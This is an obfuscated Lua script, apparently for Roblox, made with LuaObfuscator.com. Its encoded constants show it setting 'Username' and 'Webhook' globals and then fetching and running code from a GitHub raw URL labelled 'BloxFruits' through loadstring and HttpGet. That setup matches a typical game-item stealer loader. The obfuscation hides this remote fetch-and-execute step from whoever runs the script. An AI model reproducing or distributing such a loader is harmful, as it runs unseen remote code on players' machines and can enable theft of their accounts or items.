--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v107=v5(v83,v19);v19=nil;return v107;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=0;local v85;while true do if (v84==((909 + 18) -(48 + 166 + 713))) then v85=(v31/(((958 -(892 + 65)) + (2 -1))^(v32-(2 -1))))%((5 -3)^(((v33-(1 -(0 -0))) -(v32-((3 -1) -1))) + 1 + 0)) ;return v85-(v85%(1 -0)) ;end end else local v86=619 -(555 + 64) ;local v87;while true do if (v86==((1281 -(87 + 263)) -(857 + 74))) then v87=(570 -(367 + 201))^(v32-(4 -3)) ;return (((v31%(v87 + v87))>=v87) and (118 -(32 + 85))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (1==v35) then return (v37 * (436 -(67 + 113))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (4 -(954 -(802 + 150))) );v18=v18 + (5 -3) + 0 ;v35=3 -2 ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0)) then return (v42 * (16778213 -((2102 -(1069 + 118)) + 82))) + (v41 * (148681 -83145)) + (v40 * (724 -468)) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + (3 -1) + 1 );v18=v18 + 4 ;v38=1 -0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 + (0 -0) ;local v46=(v20(v44,(860 -(814 + 45)) -0 ,20 + 0 ) * ((793 -(368 + 423))^((246 -146) -68))) + v43 ;local v47=v20(v44,21,31);local v48=((v20(v44,50 -(10 + 8) )==(3 -2)) and  -(443 -(416 + 26))) or (3 -2) ;if (v47==(0 + 0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else local v93=438 -(145 + 293) ;while true do if ((430 -(44 + 386))==v93) then v47=1;v45=1486 -(998 + 173 + 315) ;break;end end end elseif (v47==(651 + 1396)) then return ((v46==(0 + 0)) and (v48 * ((773 -(201 + 571))/(1138 -((1001 -(261 + 624)) + 1022))))) or (v48 * NaN) ;end return v8(v48,v47-(4258 -3235) ) * (v45 + (v46/((2 + 0)^(189 -137)))) ;end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 -0) );v18=v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 -0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v52~=1) then else local v90=(function() return 0 + 0 ;end)();while true do if (v90~=(1638 -(1373 + 263))) then else v52=(function() return 2 -0 ;end)();break;end if (v90==(675 -(534 + 141))) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v90=(function() return 1 -0 ;end)();end if (v90==(1 -0)) then v59=(function() return {};end)();for v108= #",",v58 do local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109~=0) then else v110=(function() return 1384 -(746 + 638) ;end)();v111=(function() return nil;end)();v109=(function() return 1 + 0 ;end)();end if (v109==(1 -0)) then v112=(function() return nil;end)();while true do if (v110==(342 -(218 + 123))) then if (v111== #"\\") then v112=(function() return v21()~=(0 + 0) ;end)();elseif (v111==(2 + 0)) then v112=(function() return v24();end)();elseif (v111~= #"19(") then else v112=(function() return v25();end)();end v59[v108]=(function() return v112;end)();break;end if ((0 -0)~=v110) then else local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if (0==v127) then v128=(function() return 0;end)();while true do if (v128~=(1 -0)) then else v110=(function() return 2 -1 ;end)();break;end if (v128==0) then local v188=(function() return 560 -(306 + 254) ;end)();while true do if (v188~=(0 + 0)) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v188=(function() return 1 + 0 ;end)();end if (v188~=1) then else v128=(function() return 1 + 0 ;end)();break;end end end end break;end end end end break;end end end v90=(function() return 2;end)();end end end if (v52==(398 -(115 + 281))) then v57[ #"19("]=(function() return v21();end)();for v94= #",",v23() do local v95=(function() return v21();end)();if (v20(v95, #">", #"/")~=0) then else local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103==(2 -1)) then local v118=(function() return 0 + 0 ;end)();while true do if (v118==(0 -0)) then v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==(290 -(60 + 230))) then local v175=(function() return 572 -(426 + 146) ;end)();local v176=(function() return;end)();while true do if (v175~=(0 -0)) then else v176=(function() return 867 -(550 + 317) ;end)();while true do if (v176~=(0 -0)) then else v106[ #"gha"]=(function() return v22();end)();v106[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v104== #"|") then v106[ #"xxx"]=(function() return v23();end)();elseif (v104==2) then v106[ #"91("]=(function() return v23() -(2^(22 -6)) ;end)();elseif (v104== #"-19") then local v191=(function() return 0 -0 ;end)();local v192=(function() return;end)();while true do if (0==v191) then v192=(function() return 0;end)();while true do if (v192~=(285 -(134 + 151))) then else v106[ #"91("]=(function() return v23() -((1 + 1)^16) ;end)();v106[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v118=(function() return 1666 -(970 + 695) ;end)();end if (v118~=1) then else v103=(function() return 1026 -(706 + 318) ;end)();break;end end end if (v103~=(3 -1)) then else if (v20(v105, #" ", #"]")== #"}") then v106[1273 -(945 + 326) ]=(function() return v59[v106[2]];end)();end if (v20(v105,2,2)~= #"/") then else v106[ #"91("]=(function() return v59[v106[ #"xnx"]];end)();end v103=(function() return 3;end)();end if ((1990 -(582 + 1408))==v103) then local v119=(function() return 0;end)();while true do if (v119~=(1 + 0)) then else v103=(function() return 3 -2 ;end)();break;end if (v119==(0 -0)) then v104=(function() return v20(v95,702 -(271 + 429) , #"19(");end)();v105=(function() return v20(v95, #"?id=",22 -16 );end)();v119=(function() return 1825 -(1195 + 629) ;end)();end end end if (v103~=3) then else if (v20(v105, #"-19", #"xxx")~= #"!") then else v106[ #"http"]=(function() return v59[v106[ #"xnxx"]];end)();end v54[v94]=(function() return v106;end)();break;end end end end for v96= #":",v23() do v55,v96,v28=(function() return v53(v55,v96,v28);end)();end return v57;end if ((1500 -(1408 + 92))~=v52) then else local v92=(function() return 0;end)();while true do if (v92~=2) then else v52=(function() return 1 -0 ;end)();break;end if (0~=v92) then else v53=(function() return function(v113,v114,v115) local v116=(function() return 1086 -(461 + 625) ;end)();local v117=(function() return;end)();while true do if (v116==(241 -(187 + 54))) then v117=(function() return 0;end)();while true do if (v117~=(780 -(162 + 618))) then else v113[v114-#"}" ]=(function() return v115();end)();return v113,v114,v115;end end break;end end end;end)();v54=(function() return {};end)();v92=(function() return 1 + 0 ;end)();end if ((1 + 0)==v92) then v55=(function() return {};end)();v56=(function() return {};end)();v92=(function() return 3 -1 ;end)();end end end end end local function v29(v60,v61,v62) local v63=v60[1172 -(418 + 753) ];local v64=v60[2];local v65=v60[3];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(1 + 0 + 0) ;local v77={};local v78={};for v88=0 + 0 ,v76 do if ((v88>=v70) or (1818==85)) then v74[v88-v70 ]=v75[v88 + (530 -(406 + 123)) ];else v78[v88]=v75[v88 + (1770 -(1749 + 20)) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do local v89=1322 -(1249 + 73) ;while true do if (v89==(1 + 0)) then if ((v81<=5) or (1938==2514)) then if (v81<=((387 + 760) -(466 + 679))) then if ((4255>=55) and (v81<=(0 -(0 -0)))) then do return;end elseif (v81>1) then v78[v80[(1207 -(373 + 829)) -3 ]]=v80[(2634 -(476 + 255)) -(106 + 1794) ]~=(0 + 0) ;else local v130;local v131,v132;local v133;local v134;v78[v80[1 + (1131 -(369 + 761)) ]]=v62[v80[8 -(3 + 2) ]];v72=v72 + (2 -1) ;v80=v68[v72];v134=v80[(210 -94) -(4 + 110) ];v133=v78[v80[3]];v78[v134 + (585 -(57 + 527)) ]=v133;v78[v134]=v133[v80[(2711 -1280) -(41 + 1386) ]];v72=v72 + (104 -(17 + 86)) ;v80=v68[v72];v78[v80[2 + 0 ]]=v80[6 -3 ];v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[168 -(122 + 44) ]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v134=v80[(240 -(64 + 174)) -0 ];v131,v132=v71(v78[v134](v13(v78,v134 + (3 -2) ,v80[3 + 0 ])));v73=(v132 + v134) -(1 + 0) ;v130=0 -0 ;for v178=v134,v73 do local v179=0;while true do if ((2999>1156) and ((65 -(30 + 5 + 30))==v179)) then v130=v130 + 1 + 0 ;v78[v178]=v131[v130];break;end end end v72=v72 + (1258 -(1043 + 214)) ;v80=v68[v72];v134=v80[7 -5 ];v78[v134]=v78[v134](v13(v78,v134 + (1213 -(323 + 889)) ,v73));v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[582 -((534 -173) + 219) ]]();v72=v72 + (321 -(53 + 267)) ;v80=v68[v72];v72=v80[1 + 2 ];end elseif ((2350>1155) and (v81<=(416 -(15 + 398)))) then v78[v80[984 -(18 + 964) ]]=v62[v80[3]];elseif (v81>(14 -10)) then local v149=v80[2 + 0 ];v78[v149]=v78[v149](v13(v78,v149 + 1 + 0 ,v73));else v62[v80[853 -(20 + 830) ]]=v78[v80[338 -(144 + 192) ]];end elseif (v81<=8) then if ((4029<=4853) and (630<2127) and (v81<=(5 + 1))) then v78[v80[128 -(116 + (226 -(42 + 174))) ]]();elseif (v81==(6 + 1)) then local v153=v80[1 + 1 ];local v154,v155=v71(v78[v153](v13(v78,v153 + ((613 + 126) -(542 + 84 + 112)) ,v80[(1510 -(363 + 1141)) -3 ])));v73=(v155 + v153) -(1 + 0) ;local v156=0 + 0 ;for v180=v153,v73 do v156=v156 + 1 + 0 ;v78[v180]=v154[v156];end elseif (v78[v80[4 -2 ]]==v80[4]) then v72=v72 + (2 -(1581 -(1183 + 397))) ;else v72=v80[1554 -(1126 + 425) ];end elseif (v81<=(415 -(118 + (873 -586)))) then if ((v81>(35 -26)) or (516>3434)) then v62[v80[3 + 0 ]]=v78[v80[(840 + 283) -(118 + 1003) ]];v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[379 -(142 + 235) ]]=v80[13 -10 ];v72=v72 + (1976 -(1913 + 62)) + 0 ;v80=v68[v72];v62[v80[3]]=v78[v80[979 -(553 + 424) ]];v72=v72 + 1 ;v80=v68[v72];v78[v80[3 -1 ]]=v80[3];v72=v72 + 1 + 0 ;v80=v68[v72];v72=v80[2 + 1 + 0 ];else v72=v80[2 + (2 -1) ];end elseif (v81>(5 + 6)) then v78[v80[2 + (1933 -(565 + 1368)) ]]=v80[(22 -16) -3 ];else local v170=v80[5 -3 ];local v171=v78[v80[6 -3 ]];v78[v170 + 1 + 0 ]=v171;v78[v170]=v171[v80[19 -(1676 -(1477 + 184)) ]];end v72=v72 + (754 -(239 + 514)) ;break;end if (v89==(0 + 0)) then v80=v68[v72];v81=v80[1330 -(797 + 532) ];v89=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034B3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F2Q4D324E6562756C612F426C6F784672756974732F726566732F68656164732F6D61696E2F6D61696E03083Q00557365726E616D6503063Q00766F7877686F03073Q00576562682Q6F6B03243Q0066623161626133372D316530362D343937632D39662Q362D39616236393562386435316200153Q00120C3Q00013Q0026083Q000C000100020004093Q000C0001001203000100033Q001201000200043Q00202Q00020002000500122Q000400066Q000500016Q000200056Q00013Q00024Q00010001000100044Q001400010026083Q0001000100010004093Q0001000100120C000100083Q00120A000100073Q00122Q0001000A3Q00122Q000100093Q00124Q00023Q00044Q000100016Q00017Q00",v9(),...);
